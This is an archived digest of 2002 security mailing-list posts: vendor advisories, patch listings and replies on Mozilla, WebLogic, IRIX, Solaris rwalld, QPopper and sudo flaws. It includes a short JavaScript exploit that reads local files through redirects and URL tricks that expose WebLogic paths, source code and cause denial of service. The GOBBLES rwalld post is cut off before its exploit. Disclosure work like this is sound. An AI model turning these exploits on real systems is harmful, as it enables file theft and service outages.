eSecurityOnline Security Advisories notes

[researchteam5]

Hello,

To help clear up any confusion about the Discovery Dates associated 
with the group of advisories that we are publishing today, I should
explain the situation.

We are publishing our advisories in groups after each group is approved
internally.  With the exception of the Microsoft issues, none of the 
vulnerabilities have been posted or discussed in public forums or lists.

The discovery date that we list in the advisories refers to the date on
which we discovered the advisory, rather than the date that we made the
information public.  Since none of these vulnerabilities (except for the 
Solaris CACHEFSD) have been actively exploited / seen in the wild, we have
been patient in working with and waiting for vendors to complete
vulnerability validation, and for patches to be developed and posted to
vendor sites.

We plan to publish more advisories in the near future, and hopefully in a
much more timely fashion.

Regards,
Ken Williams
eSecurityOnline Research and Development Team

Ken Williams ; CISSP ; Technical Lead ; [EMAIL PROTECTED] 
eSecurityOnline - an eSecurity Venture of Ernst  Young 
[EMAIL PROTECTED] ; www.esecurityonline.com ; 1-877-eSecurity 

Reading local files in Netscape 6 and Mozilla (GM#001-NS)

[GreyMagic Software]

GreyMagic Security Advisory GM#001-NS
=

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
==

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.


Important notes:


Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to [EMAIL PROTECTED] and [EMAIL PROTECTED]

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a Bug Bounty program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conducts made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.


[1] http://home.netscape.com/security/bugbounty.html


Introduction:
=

XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 Jelmer published an advisory titled MSIE6 can read local
files, which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by
MS02-008).

[1] http://www.xs4all.nl/~jkuperus/bug.htm
[2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
===

Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the open method to a web page that will redirect to a
local/remote file it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText
property.


Exploit:


This example attempts to read c:/test.txt, getFile.asp internally
redirects to file://c:/test.txt:

var oXML=new XMLHttpRequest();
oXML.open(GET,getFile.asp,false);
oXML.send(null);
alert(oXML.responseText);


Solution:
=

Users of Netscape Navigator should move to a better performing, less buggy
browser.


Tested on:
==

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


Demonstration:
==

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-ns/.


Feedback:
=

Please mail any questions or comments to [EMAIL PROTECTED]

- Copyright © 2002 GreyMagic Software.

Re: QPopper 4.0.4 buffer overflow

[J Mike Rollins]

 Affected versions 4.0.3 and 4.0.4. default install.
 Servers, not processing user`s configuration file
 (~/.qpopper-options) are insensible to this bug.

Our testing has shown that you must use the -u parameter to be susceptible
to this vulnerability.

If you don't use the -u parameter for qpopper this file is not accessed.

You can use the -d parameter to view the debug output to verify this.

Mike

  UNIX Systems Administrator at Wake Forest University.
==
  J. Mike Rollins  [EMAIL PROTECTED]
 Wake Forest University http://www.wfu.edu/~rollins
Winston-Salem, NCwork: (336) 758-1938
==

KPMG-2002016: Bea Weblogic incorrect URL parsing issues

[Peter Gründl]

Title: Bea Weblogic incorrect URL parsing issues

BUG-ID: 2002016
Released: 30th Apr 2002


Problem:

The Bea Weblogic server incorrectly parses certain types of URL
requests. This can result in the physical path being revealed,
a Denial of Service situation and revealing of .jsp sourcecode.


Vulnerable:
===
- Bea Weblogic V6.1 Service Pack 2 on Windows 2000 Server
- Other versions were not tested.


Details:

A problem with the URL parser in Bea Weblogic could allow a
malicious user to reveal the physical path to the web root,
cause a Denial of Service and reveal the sourcecode of .jsp files.

Physical webroot)
By appending %00.jsp to a normal .html request, a compiler error
would in some cases be generated that would print out the path
to the physical web root. A similar result can be achieved by
prefixing with %5c (backslash):


Denial of Service)
This issue is very similar to the one reported in KPMG-2002003, in which
we published that requesting a DOS device and appending .jsp to the
request would exhaust the working threads and cause the web service to
stop parsing HTTP and HTTPS requests.

If a malicious user also added %00 in the request, it would still work.

The server can handle about 10-11 working threads, so when this
number of active threads has been reached, the server will no
longer service any requests. Since both HTTP and HTTPS are handled
by the same module, both are crippled if one is attacked.


Sourcecode revealed)
There are a number of ways to manipulate the URL in a way that will
allow a malicious user to read the contents of a .jsp file.
One way is to append %00x to the request, another could be to add
+. to the request (exclamation marks excluded).



Vendor URL:
===
You can visit the vendors webpage here: http://www.bea.com


Vendor response:

The vendor was contacted about the first issue on the 6th of
November, 2001 and subsequently on the 12th of March, 2002 and
finally on the 22nd of March, 2002 about the remainding issues.
On the 25th of March, 2002 we received a private hotfix, which
corrected the issues. On the 22nd of April, 2002 the vendor
released a public bulletin.

The vendors bulletin can be seen here: (note that the url has
been wrapped for readability)

http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?
highlight=advisoriesnotificationspath=components/dev2dev/
resourcelibrary/advisoriesnotifications/
securityadvisoriesbea020303.htm

Be sure you read the vendor bulletin, as it suggests other
security settings that might prevent future similar issues.


Corrective action:
==
The following has been copied from the vendor bulletin:

BEA WebLogic Server and Express version 6.1 standalone
 or as part of BEA WebLogic Enterprise 6.1 on all OS platforms
 Action: Apply Service Pack 2 and then apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR069809_610sp2_v2.jar

 When Service Pack 3 becomes available, you can use that jar
 instead of Service Pack 2 and this patch.


 BEA WebLogic Server and Express version 6.0 standalone
 or as part of BEA WebLogic Enterprise 6.0 on all OS platforms
 Action: Apply Service Pack 2 with Rolling Patch 3 and then
 apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR069809_60sp2rp3.jar


 BEA WebLogic Server and Express version 5.1 standalone
 or as part of BEA WebLogic Enterprise 5.1.x on all OS platforms
 Action: Apply Service Pack 11 and then apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR069809_510sp11_v2.jar

 When Service Pack 12 becomes available, you can use that jar
 instead of Service Pack 11 and this patch.


 BEA WebLogic Server and Express 4.5.2 on all OS platforms
 Action: Apply Service Pack 2 and then apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR045420_wls452sp2.zip


 BEA WebLogic Server and Express 4.5.1 on all OS platforms
 Action: Apply Service Pack 15.



Author: Peter Gründl ([EMAIL PROTECTED])


KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.

Re: Slrnpull Buffer Overflow (-d parameter)

[Bill Nottingham]

Alex Hernandez ([EMAIL PROTECTED]) said: 
 Linux RH.6.2 Sparc64 and below versions.

On Red Hat Linux 6.2 for sparc:

# ls -l /usr/bin/slrnpull
-rwxr-s---1 news news48688 Feb  7  2000 /usr/bin/slrnpull 
# rpm -q slrn-pull
slrn-pull-0.9.6.2-4

With all updates applied:

# ls -l /usr/bin/slrnpull
-rwxr-s---1 root news55456 Mar  1  2001 /usr/bin/slrnpull
# rpm -q slrn-pull
slrn-pull-0.9.6.4-0.6

Hence, while you may be able to get group news, the program is only
runnable by group news. So, I don't think there are any security
implications here.

Bill

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

[Thor Larholm]

Disturbing.

Netscape sure must be in financial problems since they are selling out on
their users security for a lousy $1000.

I know for one that I personally will release any future Netscape advisories
with full public disclosure and without prior Netscape notification. As a
matter of fact, why not start now ?

The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun.
A typical IRC URL could look like this:

IRC://IRC.YOUR.TLD/#YOURCHANNEL

The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. 
If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following
error: 

The exception unknown software exception (0xc0fd) occured in the
application at location 0x60e42edf 

Mozilla 0.9.9 gives a similar exception: 

The exception unknown software exception (0xc0fd) occured in the
application at location 0x60dd2c79.

Other versions of Mozilla/NS6/Galeon likely share the same flaw.
I haven't tested further on how practically exploitable this is.
Short example online at

http://jscript.dk/2002/4/moz1rc1tests/ircbufferoverrun.html

Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection
vulnerability.

When embedding a stylesheet with the LINK element, access to CSS files
from other protocols is prohibited by the security manager. A simple HTTP
redirect circumvents this security restriction and it becomes possible to
use local or remote files of any type, with the side effect that you can
detect if specific local files exist.

http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp


Regards
Thor Larholm
Jubii A/S - Internet Programmer



-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape 6 and Mozilla (GM#001-NS)


GreyMagic Security Advisory GM#001-NS
=

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
==

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.


Important notes:


Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to [EMAIL PROTECTED] and [EMAIL PROTECTED]

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a Bug Bounty program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conducts made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.


[1] http://home.netscape.com/security/bugbounty.html


Introduction:
=

XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 Jelmer published an advisory titled MSIE6 can read local
files, which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by
MS02-008).

[1] http://www.xs4all.nl/~jkuperus/bug.htm
[2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
===

Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the open method to a web page that will redirect to a
local/remote file it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText
property.


Exploit:


This example attempts to read c:/test.txt, getFile.asp internally
redirects to file://c:/test.txt:

var oXML=new XMLHttpRequest();
oXML.open(GET,getFile.asp,false);
oXML.send(null);
alert(oXML.responseText);


Solution:
=

Users of Netscape Navigator should move to a better performing, less buggy
browser.


Tested on:
==

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


Demonstration:
==

A fully dynamic proof-of-concept demonstration of this issue is available at

IRIX cpr vulnerability

[SGI Security Coordinator]

-BEGIN PGP SIGNED MESSAGE-

_

  SGI Security Advisory

Title:  IRIX cpr vulnerability
Number: 20020409-01-I
Date:   April 30, 2002
Reference:  CAN-2002-0173
__

- ---
- --- Issue Specifics ---
- ---

It's been reported that there is a potential buffer overflow vulnerability
in the /usr/sbin/cpr program. If successfully exploited, this can lead to a
root compromise.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected IRIX 6.5.11 and later versions.


- --
- --- Impact ---
- --

The cpr binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.cpr (the SGI Checkpoint-Restart Software).

To see if cpr is installed, execute the following command:

  $ versions eoe.sw.cpr
  I = Installed, R = Removed

 Name DateDescription

 I  eoe  09/19/2000  IRIX Execution Environment, 6.5.10f
 I  eoe.sw   09/19/2000  IRIX Execution Environment Software
 I  eoe.sw.cpr   09/19/2000  SGI Checkpoint-Restart Software

If the command returns output similar to the above, then cpr is installed.

This vulnerability may not be exploited by a remote user, a local account
is required.

This vulnerability has been fixed in IRIX 6.5.11.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0173


- 
- --- Temporary Workaround ---
- 

If you don't use the Checkpoint Restart software, it can be uninstalled
using the command:

  # versions remove eoe.sw.cpr

If you use the software, then SGI recommends upgrading to IRIX 6.5.11
or later.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation is
to upgrade to IRIX 6.5.11 or later.


   OS Version Vulnerable? Patch #  Other Actions
   -- --- ---  -
   IRIX 3.xunknown Note 1
   IRIX 4.xunknown Note 1
   IRIX 5.xunknown Note 1
   IRIX 6.0.x  unknown Note 1
   IRIX 6.1unknown Note 1
   IRIX 6.2unknown Note 1
   IRIX 6.3unknown Note 1
   IRIX 6.4unknown Note 1
   IRIX 6.5  yes   Notes 2  3
   IRIX 6.5.1yes   Notes 2  3
   IRIX 6.5.2yes   Notes 2  3
   IRIX 6.5.3yes   Notes 2  3
   IRIX 6.5.4yes   Notes 2  3
   IRIX 6.5.5yes   Notes 2  3
   IRIX 6.5.6yes   Notes 2  3
   IRIX 6.5.7yes   Notes 2  3
   IRIX 6.5.8yes   Notes 2  3
   IRIX 6.5.9yes   Notes 2  3
   IRIX 6.5.10   yes   Notes 2  3
   IRIX 6.5.11   no
   IRIX 6.5.12   no
   IRIX 6.5.13   no
   IRIX 6.5.14   no
   IRIX 6.5.15   no
   IRIX 6.5.16   no


   NOTES

 1) This version of the IRIX operating has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.11 or a later version of IRIX.


- 
- --- Acknowledgments 
- 

SGI wishes to thank TESO Security, FIRST and the users of the Internet
Community at large for their assistance in this matter.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or

IRIX /dev/ipfilter Denial of Service vulnerability

[SGI Security Coordinator]

-BEGIN PGP SIGNED MESSAGE-

_

  SGI Security Advisory

Title:  /dev/ipfilter Denial of Service vulnerability
Number: 20020408-01-I
Date:   April 30, 2002
Reference:  CAN-2002-0172
__

- ---
- --- Issue Specifics ---
- ---

SGI has determined that the default permissions on /dev/ipfilter as created
by /dev/MAKEDEV could lead to a Denial of Service attack.  The default
permissions were 644, and while the permissions are set to that value it is
possible for a non-root user to disrupt network traffic.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.


- --
- --- Impact ---
- --

The /dev/ipfilter device is created by default on IRIX 6.5 systems during
installation.  The ipfilterd software that is intended to use this device is
not installed by default, it is part of the eoe.sw.ipgate package.

To determine if you are vulnerable, execute the following command:

   $ ls -l /dev/ipfilter
   crw-r--r--1 root sys59,  0 Apr 12 08:33 /dev/ipfilter

If your /dev/ipfilter shows the permissions and ownership of 644 as in the
example above, then you are vulnerable.

These vulnerabilities may not be exploited by a remote user, a local account
is required.

This issue has been corrected in IRIX 6.5.11 and later versions.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0172


- 
- --- Temporary Workaround ---
- 

You can fix the permissions of /dev/ipfilter with the following command:

   # chmod 600 /dev/ipfilter

After running that command, it should look like this:

   # ls -l /dev/ipfilter
   crw---1 root sys59,  0 Apr 12 08:33 /dev/ipfilter

However, SGI recommends upgrading to IRIX 6.5.11 or later because if the
/dev/MAKEDEV script is run it will reset the permissions to 644.  The
/dev/MAKEDEV script has been changed in IRIX 6.5.11 to create the device
with 600 permissions.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation is
to upgrade to IRIX 6.5.11 or later.


   OS Version Vulnerable? Patch #  Other Actions
   -- --- ---  -
   IRIX 3.xunknown Note 1
   IRIX 4.xunknown Note 1
   IRIX 5.xunknown Note 1
   IRIX 6.0.x  unknown Note 1
   IRIX 6.1unknown Note 1
   IRIX 6.2unknown Note 1
   IRIX 6.3unknown Note 1
   IRIX 6.4unknown Note 1
   IRIX 6.5  yes   Notes 2  3
   IRIX 6.5.1yes   Notes 2  3
   IRIX 6.5.2yes   Notes 2  3
   IRIX 6.5.3yes   Notes 2  3
   IRIX 6.5.4yes   Notes 2  3
   IRIX 6.5.5yes   Notes 2  3
   IRIX 6.5.6yes   Notes 2  3
   IRIX 6.5.7yes   Notes 2  3
   IRIX 6.5.8yes   Notes 2  3
   IRIX 6.5.9yes   Notes 2  3
   IRIX 6.5.10   yes   Notes 2  3
   IRIX 6.5.11   no
   IRIX 6.5.12   no
   IRIX 6.5.13   no
   IRIX 6.5.14   no
   IRIX 6.5.15   no
   IRIX 6.5.16   no


   NOTES

 1) This version of the IRIX operating has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.11 or later.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or

IRIX pmcd Denial of Service vulnerability

[SGI Security Coordinator]

-BEGIN PGP SIGNED MESSAGE-

_

  SGI Security Advisory

Title:  pmcd Denial of Service vulnerability
Number: 20020407-01-I
Date:   April 30, 2002
Reference:  CAN-2000-1193

__

- ---
- --- Issue Specifics ---
- ---

It's been reported that it is possible to feed certain parameters to the
/usr/etc/pmcd daemon that will make it grow in size to the point where a
Denial of Service attack can be created.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in IRIX 6.5.11 and later versions.


- --
- --- Impact ---
- --

The pmcd daemon is part of SGI's Performance Co-Pilot suite of performance
monitoring tools.  This is an optional product and is not installed by
default, but is supplied with the base OS.

To see if pmcd is installed, execute the following command:

% versions pcp_eoe
I = Installed, R = Removed

   Name DateDescription

   I  pcp_eoe  01/22/2002  Performance Co-Pilot Execution Only
   Environment, 6.5.15f
   I  pcp_eoe.man  01/22/2002  PCP EOE Documentation, 6.5.15f
   I  pcp_eoe.man.relnotes 01/22/2002  PCP EOE Release Notes, 6.5.15f
   I  pcp_eoe.sw   01/22/2002  PCP EOE Software, 6.5.15f
   I  pcp_eoe.sw.eoe   01/22/2002  PCP EOE, 6.5.15f

If the output looks similar to the above, then Performance Co-Pilot is
installed, and you are vulnerable if the version shown is earlier than
6.5.11.

This vulnerability may be exploited by a remote user, no local account
is required.

This vulnerability has been fixed in IRIX 6.5.11 and later versions.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1193
http://www.iss.net/security_center/static/4284.php


- 
- --- Temporary Workaround ---
- 

If you don't use the Performance Co-Pilot software, it can be uninstalled
using the command:

  # versions remove pcp_eoe

If you use the software, then SGI recommends upgrading to IRIX 6.5.11 or a
later version.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation is
to upgrade to IRIX 6.5.11 or a later version.


   OS Version Vulnerable? Patch #  Other Actions
   -- --- ---  -
   IRIX 3.xunknown Note 1
   IRIX 4.xunknown Note 1
   IRIX 5.xunknown Note 1
   IRIX 6.0.x  unknown Note 1
   IRIX 6.1unknown Note 1
   IRIX 6.2unknown Note 1
   IRIX 6.3unknown Note 1
   IRIX 6.4unknown Note 1
   IRIX 6.5  yes   Notes 2  3
   IRIX 6.5.1yes   Notes 2  3
   IRIX 6.5.2yes   Notes 2  3
   IRIX 6.5.3yes   Notes 2  3
   IRIX 6.5.4yes   Notes 2  3
   IRIX 6.5.5yes   Notes 2  3
   IRIX 6.5.6yes   Notes 2  3
   IRIX 6.5.7yes   Notes 2  3
   IRIX 6.5.8yes   Notes 2  3
   IRIX 6.5.9yes   Notes 2  3
   IRIX 6.5.10   yes   Notes 2  3
   IRIX 6.5.11   no
   IRIX 6.5.12   no
   IRIX 6.5.13   no
   IRIX 6.5.14   no
   IRIX 6.5.15   no
   IRIX 6.5.16   no


   NOTES

 1) This version of the IRIX operating has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.11 or a later version of IRIX.


- 
- --- Acknowledgments 
- 

SGI wishes to thank Marcelo Magnasco, ISS, FIRST and the users of the
Internet Community at large for their assistance in this matter.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and

Adivosry + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System

[gobbles]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

GOBBLES SECURITY ADVISORY #32

ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

Forward:
@route so was fydor trying to make his code unreadable when he write nmap?
@route or was that just the fallout of poor planning?
@route this is awful
@route if ( !victim || !sport || !dport || sd  0) {
@route   fprintf(stderr, send_udp_raw: One or more of your parameters
 suck!\n);
@route   free(packet);
@route   return -1;
@route }
@route This is the program that is used everywhere and written up in
 countless books?
@route it's pretty much obscene that this program doesnt use libnet

Systems Affected:
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
(sparc and x86 versions)


Threat Level:
Super duper high.


Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th.

After long series of email exchange, Sun.com engineers finally begin working
on developing patch for bug.

Days later, CERT contact GOBBLES about bug.  Dialouge happen then too with
CERT.  Both Sun Microsystems and CERT have promised to make sure that
GOBBLES name is in both official advisories released.  Hey, we do this for
fame and attention, now that we are no longer weaned we must do something!

Some time, full disclosure is real pain in ass.  Everyone want more and more
time to get things fixed before advisory is released.  Time to grace lists
with more GOBBLES Advisory.


Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the
bottom of this email.  GOBBLES wrote it in way to keep unskilled from using
it, like security assesment team from Vigilante who not able to tell if
vulnerability is real or not in opensourced product after reading advisory.
At the same time, skilled penetrators should not have any trouble using the
code provided to exploit systems in the wild.

Don't send GOBBLES email asking for other versions of exploit.  Some things
better left private and given to close friends for their own motivations.
If you can't figure out how to work with this exploit and get remote root
from what is provided in the advisory, really there is no reason for you to
be using an exploit.


A Few Words:
There are some thing that GOBBLES have to say, some thing very heartfelt
that he need to communicate to the world, some thing that best said in song,
please take time to read lyric and understand what GOBBLES trying to say. . .

the sun has blessed
 the rays are gone
 and all the kids have left their tears and gone home,

 sweet 17, sour 29
 and i can't explain myself
 what i'd hoped to find
 you were all so kind
 when i was near,

 and if you're still feeling down
 then maybe you need me around
 to love and hold you
 don't say i hadn't told you so
 maybe you need me around,

 i had no luck
 i had no shame
 i had no cause
 just seventeen days of rain
 and you in my eyes,

 just one more song to slay this earth
 and i can't explain myself just what it's worth
 what was all i had
 but not all i'd need
 and i can't escape the fact that i still bleed,

 and if you're still feeling down
 and if this seems way too loud
 then maybe you need me around,

 i had no voice
 i had no drive
 i had no choice
 i've done my time
 had myself
 had my band
 i had my love
 had no hand in watching it all fall apart

 and if you're still feeling down
 then maybe you need me around
 to lift and scold you
 to send you crashing all right now
 maybe you need me around.

- -Blissed and Gone, the Smashing Pumpkins


Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 is has an
insecure syslog() statement, which allow remote attacker to execute custom
code as root.

Hehe, GOBBLES bet you getting pissed because in all this length of advisory,
still no mention of what is vulnerable, hehehe, ;.  Keep
control of temper, and keep reading, because you about to find out, hehehe
GOBBLES is silly today.


Remotely Exploitable:
Yes.

Locally Exploitable:
Yes.

Privilage Attained After Exploitation:
Root.

Exploit Included:
As GOBBLES did mention previously, yes.  It get you root.  Girls will be
impressed with mailing list reading skills and source code leeching
technique utilized to gain remote root to Solaris machines.  Included
exploit for Sparc.


Name of Vulnerable Service:
$ grep rwall /etc/inetd.conf
# The rwall server allows others to post messages to users on this machine.
walld/1 tli rpc/datagram_v  wait root /usr/lib/netsvc/rwall/rpc.rwalld 
 rpc.rwalld

It rwalld that vulnerable.  It run as root.  Attacker get root from
exploiting it.


Description of Problem (Part Two):
Inside rwall_subr.c we see:

   /*
* Make sure the wall programs exists, is executeable, and runs
*/
   if (rval == -1 || (wall.st_mode  S_IXUSR) == 0 ||
  (fp = popen(WALL_PROG, w)) == NULL) {
  syslog(LOG_NOTICE,
   rwall message received but could not 

SuSE Security Announcement: sudo (SuSE-SA:2002:014)

[Sebastian Krahmer]

-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:sudo
Announcement-ID:SuSE-SA:2002:014
Date:   Tue Apr 30 16:00:00 MEST 2002
Affected products:  6.4, 7.0, 7.1, 7.2, 7.3, 8.0,
SuSE Firewall Adminhost VPN,
SuSE Linux Admin-CD for Firewall,
SuSE Linux Enterprise Server,
SuSE Linux Connectivity Server
Vulnerability Type: local privilege escalation
Severity (1-10):6
SuSE default package:   yes
Other affected systems: All systems with sudo installed.

Content of this advisory:
1) security vulnerability resolved: Heap overflow in sudo.
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

The sudo program allows local users to execute certain configured
commands with root priviledges. Sudo contains a heap overflow in its
prompt assembling function. The input used to create the password prompt
is user controlled and not properly length-checked before copied to certain
heap locations. This allows local attackers to overflow the heap of sudo,
thus executing arbitrary commands as root.
We would like to thank GlobalInterSec for finding and researching
this vulnerability.
As a temporary workaround you may remove the setuid bit from sudo by
issuing the following command as root: chmod -s /usr/bin/sudo.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

i386 Intel Platform:

SuSE-8.0
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap1/sudo-1.6.5p2-79.i386.rpm
  b54f68ff4b32f9d920f2f1ff887d1ddc
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sudo-1.6.5p2-79.src.rpm
  fd1ccf6fe52c6b999c5ed24a2f3a4e65

SuSE-7.3
ftp://ftp.suse.com/pub/suse/i386/update/7.3/ap1/sudo-1.6.3p7-83.i386.rpm
  80edbf5caf02c519cf2c01d6ba76d22f
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sudo-1.6.3p7-83.src.rpm
  77962932840740ce5e3dfe57a887592d

SuSE-7.2
ftp://ftp.suse.com/pub/suse/i386/update/7.2/ap1/sudo-1.6.3p6-92.i386.rpm
  669aa8db134e39f462cb9f2648f6735f
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sudo-1.6.3p6-92.src.rpm
  249b1ef0135dcfede3648982900e277c

SuSE-7.1
ftp://ftp.suse.com/pub/suse/i386/update/7.1/ap1/sudo-1.6.3p6-91.i386.rpm
  6b3b84f0a4c687e91da179937b87048a
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sudo-1.6.3p6-91.src.rpm
  bf59a6b200a0fb130f3528ce23698be0

SuSE-7.0
ftp://ftp.suse.com/pub/suse/i386/update/7.0/ap1/sudo-1.6.3p6-90.i386.rpm
  5b67ef9fed383242111953d942c62174
source rpm:
